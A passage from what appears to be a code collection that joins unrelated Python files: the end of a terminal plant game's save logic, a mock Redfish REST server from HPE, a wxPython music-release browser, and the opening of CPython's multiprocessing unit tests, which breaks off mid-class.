json_file = os.path.join(self.botany_dir,self.this_user + '_plant_data.json')
# also updates age
age_formatted = self.plant_age_convert(this_plant)
plant_info = {
"owner":this_plant.owner,
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
"is_dead":this_plant.dead,
"last_watered":this_plant.watered_timestamp,
"file_name":this_plant.file_name,
"stage": this_plant.stage_list[this_plant.stage],
"generation": this_plant.generation,
}
if this_plant.stage >= 3:
plant_info["rarity"] = this_plant.rarity_list[this_plant.rarity]
if this_plant.mutation != 0:
plant_info["mutation"] = this_plant.mutation_list[this_plant.mutation]
if this_plant.stage >= 4:
plant_info["color"] = this_plant.color_list[this_plant.color]
if this_plant.stage >= 2:
plant_info["species"] = this_plant.species_list[this_plant.species]
with open(json_file, 'w') as outfile:
json.dump(plant_info, outfile)
def harvest_plant(self, this_plant):
# TODO: plant history feature - could just use a sqlite query to retrieve all of user's dead plants
# harvest is a dict of dicts
# harvest contains one entry for each plant id
age_formatted = self.plant_age_convert(this_plant)
this_plant_id = this_plant.plant_id
plant_info = {
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
}
if os.path.isfile(self.harvest_file_path):
# harvest file exists: load data
with open(self.harvest_file_path, 'rb') as f:
this_harvest = pickle.load(f)
new_file_check = False
else:
this_harvest = {}
new_file_check = True
this_harvest[this_plant_id] = plant_info
# dump harvest file
temp_path = self.harvest_file_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_harvest, f, protocol=2)
os.rename(temp_path, self.harvest_file_path)
# dump json file
with open(self.harvest_json_path, 'w') as outfile:
json.dump(this_harvest, outfile)
return new_file_check
if __name__ == '__main__':
my_data = DataManager()
# if plant save file exists
if my_data.check_plant():
my_plant = my_data.load_plant()
# otherwise create new plant
else:
my_plant = Plant(my_data.savefile_path)
my_data.data_write_json(my_plant)
# my_plant is either a fresh plant or an existing plant at this point
my_plant.start_life()
my_data.start_threads(my_plant)
try:
botany_menu = CursedMenu(my_plant,my_data)
my_data.save_plant(my_plant)
my_data.data_write_json(my_plant)
my_data.update_garden_db(my_plant)
finally:
cleanup()
|
server.py
|
#!/usr/bin/env python3
#
# (C) Copyright 2020 Hewlett Packard Enterprise Development LP.
# Licensed under the Apache v2.0 license.
#
import re
import os
import sys
import json
import glob
import copy
import importlib
from log import Log
from threading import Thread
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
# ----------------------------------------------------------------------------------------------------------------------
def browser_update(node):
def is_redfish(value): return type(value) is str and value.startswith('/redfish/v1')
def href(value): return '<a href={0}>{0}</a>'.format(value)
if type(node) is list:
for i,value in enumerate(node):
if is_redfish(value): node[i] = href(value)
browser_update(node[i])
elif type(node) is dict:
for key,value in node.items():
if is_redfish(value): node[key] = href(value)
browser_update(value)
# ----------------------------------------------------------------------------------------------------------------------
#
# Method Scope Semantics
# ------- ---------- ----------------------------------------------------
# GET collection Retrieve all resources in a collection
# GET resource Retrieve a single resource
# HEAD collection Retrieve all resources in a collection (header only)
# HEAD resource Retrieve a single resource (header only)
# POST collection Create a new resource in a collection
# PUT resource Update a resource
# PATCH resource Update a resource
# DELETE resource Delete a resource
# OPTIONS any Return available HTTP methods and other options
#
# ----------------------------------------------------------------------------------------------------------------------
class RestHandler(BaseHTTPRequestHandler):
def normalize_path(self, path):
new_path = path
#
# Prepend '/' if needed.
# If the file name doesn't begin with '/redfish/v1', then add it.
# If the file name ends with 'index.json', remove it.
# Strip off the trailing '/'.
#
if new_path == '/':
new_path = self.server.env['redfish_base']
if new_path[0] != '/':
new_path = '/{}'.format(new_path)
if not new_path.startswith(self.server.env['redfish_base']):
new_path = '{}/{}'.format(self.server.env['redfish_base'], new_path)
if new_path[-1] == '/':
new_path = new_path[:-1]
if new_path.endswith('/index.json'):
new_path = new_path.rsplit('/',1)[0]
return new_path
def log_message(self, format, *args):
return
# ----------------------------------------------------------------------------------------------
def reply(self, status, headers=None, data=None):
encoded_data = data.encode() if data else None
if headers and 'Content-Length' not in headers:
headers['Content-Length'] = str(len(encoded_data))
try:
self.send_response(status)
if headers:
for key,value in headers.items():
self.send_header(key, value)
self.end_headers()
if encoded_data:
self.wfile.write(encoded_data)
except:
Log.info('can\'t reply to requester')
# ----------------------------------------------------------------------------------------------
def do_HEAD(self):
Log.info('HEAD {}', self.path)
# ----------------------------------------------------------------------------------------------
def do_GET(self):
Log.info('GET {}', self.path)
path = self.normalize_path(self.path)
#
# If we don't know this resource, send 404.
#
if path not in self.server.attributes:
self.reply(404)
return
#
# Get the resource. Update the links if requested.
#
data = copy.deepcopy(self.server.attributes[path])
if self.server.env['browser']:
browser_update(data)
data = '<pre>' + json.dumps(data, indent=4, separators=(',', ': ')) + '</pre>'
content_type = 'text/html'
else:
data = json.dumps(data, indent=4, separators=(',', ': '))
content_type = 'application/json'
headers = { 'Content-Type' : content_type,
'Cache-Control' : 'no-cache, no-store, must-revalidate',
'Pragma' : 'no-cache',
'Expires' : '0' }
self.reply(200, headers, data)
# ----------------------------------------------------------------------------------------------
def do_POST(self):
Log.info('POST {}', self.path)
path = self.normalize_path(self.path)
data_length = int(self.headers['Content-Length'])
try:
data = json.loads(self.rfile.read(data_length).decode('utf-8'))
except Exception as e:
Log.info('invalid POST request - JSON improperly formatted')
self.reply(400)
return
#
# If the resource doesn't exist, then 404.
# If the resource isn't a collection, then 405.
# Otherwise, 204
#
if path not in self.server.attributes:
self.reply(404)
elif 'Members' not in self.server.attributes[path]:
self.reply(405)
else:
#
# Find a resource id for the new entry.
#
resource = self.server.attributes[path]
members = resource['Members']
members_id = sorted([ int(x.get('@odata.id').rsplit('/',1)[1]) for x in members ])
last = members_id[0]
for x in members_id[1:]:
if x != last+1: break
last = x
#
# Name the new entry.
#
new_id = last + 1
data_id = '{}/{}'.format(path, new_id)
data['@odata.id'] = data_id
#
# Update the resource to include the new entry.
#
resource['Members'].append({'@odata.id' : data_id })
resource['Members@odata.count'] += 1
#
# Put the new entry into the tree.
#
self.server.attributes[data_id] = data
#
# Reply to the user.
#
headers = { 'Location' : data_id }
self.reply(204, headers)
# ----------------------------------------------------------------------------------------------
def do_PUT(self):
Log.info('PUT {}', self.path)
self.reply(405)
# ----------------------------------------------------------------------------------------------
def do_PATCH(self):
Log.info('PATCH {}', self.path)
path = self.normalize_path(self.path)
data_length = int(self.headers['Content-Length'])
try:
data = json.loads(self.rfile.read(data_length).decode('utf-8'))
except Exception as e:
Log.info('invalid PATCH request - JSON improperly formatted {} -> {}', data_length, data)
self.reply(400)
return
#
# If the resource doesn't exist, then 404.
# If the resource is a collection, then 405.
# Otherwise, 204.
#
if path not in self.server.attributes:
status = 404
elif 'Members' in self.server.attributes[path]:
status = 405
else:
status = 204
self.server.node.do_PATCH(path, data)
#
# Reply to user.
#
self.reply(status)
# ----------------------------------------------------------------------------------------------
def do_DEEPPATCH(self):
Log.info('DEEPPATCH {}', self.path)
self.reply(405)
# ----------------------------------------------------------------------------------------------
def do_DELETE(self):
Log.info('DELETE {}', self.path)
path = self.normalize_path(self.path)
parent_path = path.rsplit('/', 1)[0]
#
# If the resource doesn't exist, then 404.
# If the parent doesn't exist, then 405.
# If the parent isn't a collection, then 405.
# Otherwise, 204
#
if path not in self.server.attributes:
status = 404
elif parent_path not in self.server.attributes:
status = 405
elif 'Members' not in self.server.attributes[parent_path]:
status = 405
else:
status = 204
del self.server.attributes[path]
for i,m in enumerate(self.server.attributes[parent_path]['Members']):
if m['@odata.id'] == self.path:
del self.server.attributes[parent_path]['Members'][i]
self.server.attributes[parent_path]['Members@odata.count'] -= 1
break
#
# Reply to user.
#
self.reply(status)
# ----------------------------------------------------------------------------------------------------------------------
class RedfishServer():
def __init__(self, node):
#
# Setup the REDfish server.
#
addr,_,port = node.env['profile']['address'].partition(':')
if not port: port = '8081'
self.server = HTTPServer((addr, int(port)), RestHandler)
self.server.node = node
self.server.env = node.env
self.server.attributes = node.env['attributes']
#
# Create the REDfish thread.
#
self.thread = Thread(target=self.run, daemon=True)
def run(self):
self.server.serve_forever()
def start(self):
self.thread.start()
# ----------------------------------------------------------------------------------------------------------------------
|
browse.py
|
import wx
import sys
import time
import webbrowser
from threading import Thread
from wx.lib.mixins.listctrl import ListCtrlAutoWidthMixin
from .util import get_bitmap
from ..util import get_releases, get_picture
THUMB_SIZE = 100
LOOK_AHEAD = 30
class BrowseFrame(wx.Frame):
def __init__(self, parent):
wx.Frame.__init__(self, parent, -1,
title="DNAP",
style=wx.RESIZE_BORDER | wx.CLOSE_BOX | wx.CAPTION | wx.CLIP_CHILDREN | wx.STAY_ON_TOP
)
self.adding_items = False
self.thread = None
self.releases = sorted(get_releases(), key=lambda release: -release["first_seen"])
self.labels = ["all"] + sorted(list(set([release["source"] for release in self.releases])))
self.current_label = None
self.init_position(435, 730)
self.init_content()
self.show_releases("all")
def init_position(self, width, height):
# FIXME: Find current display id
display_area = wx.Display(0).GetClientArea()
display_width, display_height = display_area.GetWidth(), display_area.GetHeight()
self.SetSize((width, height))
if sys.platform == "darwin":
# Top-right
title_bar_height = self.GetRect().height - self.GetClientRect().height
position = (display_width - width, title_bar_height)
else:
# Bottom-right
position = (display_width - width, display_height - height)
self.SetPosition(position)
def init_content(self):
sizer = wx.BoxSizer(wx.VERTICAL)
combo = wx.Choice(self, -1, choices=self.labels)
combo.SetSelection(0)
self.Bind(wx.EVT_CHOICE, lambda e: self.show_releases(e.GetString()))
self.init_list()
self.image_list = wx.ImageList(THUMB_SIZE, THUMB_SIZE)
self.list.SetImageList(self.image_list, wx.IMAGE_LIST_SMALL)
sizer.Add(combo, flag=wx.EXPAND | wx.ALL, border=5)
sizer.Add(self.list, proportion=1, flag=wx.EXPAND | wx.ALL ^ wx.TOP, border=5)
self.SetSizer(sizer)
def init_list(self):
class AutoWidthListCtrl(wx.ListCtrl, ListCtrlAutoWidthMixin):
def __init__(self, *args, **kwargs):
wx.ListCtrl.__init__(self, *args, **kwargs)
ListCtrlAutoWidthMixin.__init__(self)
self.list = AutoWidthListCtrl(self, style=wx.LC_REPORT | wx.LC_SINGLE_SEL | wx.LC_NO_HEADER)
self.list.setResizeColumn(2)
self.list.Bind(wx.EVT_SCROLLWIN, self.handle_scroll)
self.list.Bind(wx.EVT_MOUSEWHEEL, self.handle_scroll)
self.list.Bind(wx.EVT_MOTION, self.handle_hover)
self.list.Bind(wx.EVT_LEFT_UP, self.handle_click)
cover_column = wx.ListItem()
cover_column.SetMask(wx.LIST_MASK_TEXT)
cover_column.SetText("Cover")
cover_column.SetWidth(THUMB_SIZE + 8)
self.list.InsertColumn(0, cover_column)
album_column = wx.ListItem()
album_column.SetMask(wx.LIST_MASK_TEXT)
album_column.SetText("Album")
album_column.SetWidth(210)
self.list.InsertColumn(1, album_column)
price_column = wx.ListItem()
price_column.SetMask(wx.LIST_MASK_TEXT)
price_column.SetAlign(wx.LIST_FORMAT_RIGHT)
price_column.SetText("Price")
price_column.SetWidth(70)
self.list.InsertColumn(2, price_column)
self.list.setResizeColumn(2)
def handle_scroll(self, event):
event.Skip()
if self.list.GetItemCount() == len(self.current_releases):
return
pos = self.list.GetScrollPos(wx.VERTICAL)
if pos >= self.list.GetItemCount() - LOOK_AHEAD:
if self.thread and self.thread.is_alive():
return
self.thread = Thread(target=self.add_releases, args=(LOOK_AHEAD,))
self.thread.start()
def add_release(self, release, release_index):
bmp = get_bitmap(release, resize_width=THUMB_SIZE)
image_index = self.image_list.Add(bmp)
index = self.list.InsertItem((1 << 31) - 1, image_index)
self.list.SetItem(index, 1, " %s – %s" % (release["source"], release["title"]))
self.list.SetItem(index, 2, release["price"])
self.list.SetItemData(index, release_index)
def add_releases(self, count):
if self.adding_items:
return
self.adding_items = True
log.debug("Adding %d more items to list..." % count)
start = self.list.GetItemCount()
end = min((start + count, len(self.current_releases)))
for i in range(start, end):
if not self.adding_items:
break
get_picture(self.current_releases[i]) # Preloading the image while still in the thread
wx.CallAfter(self.add_release, self.current_releases[i], i) # Called on main thread
time.sleep(0.01)
self.adding_items = False
def show_releases(self, label):
if label == self.current_label:
return
if self.thread and self.thread.is_alive():
self.adding_items = False
while self.thread.is_alive():
time.sleep(0.01)
self.current_label = label
if label == "all":
self.current_releases = self.releases
else:
self.current_releases = [release for release in self.releases if release["source"] == label]
self.list.DeleteAllItems()
self.image_list.RemoveAll()
to_load = self.list.GetCountPerPage() + LOOK_AHEAD
self.thread = Thread(target=self.add_releases, args=(to_load,))
self.thread.start()
def hovered_index(self, event):
pos = event.GetPosition()
item = self.list.HitTest(pos)
if item and len(item) > 0:
index = item[0]
if index >= 0:
return index
def handle_hover(self, event):
event.Skip()
index = self.hovered_index(event)
if index is not None and not self.list.IsSelected(index):
self.list.Select(index)
self.Raise()
self.list.SetFocus()
def handle_click(self, event):
event.Skip()
index = self.hovered_index(event)
if index is not None:
release_index = self.list.GetItemData(index)
release = self.current_releases[release_index]
webbrowser.open(release["link"])
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
from test.support import socket_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=support.LONG_TIMEOUT):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=support.SHORT_TIMEOUT)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
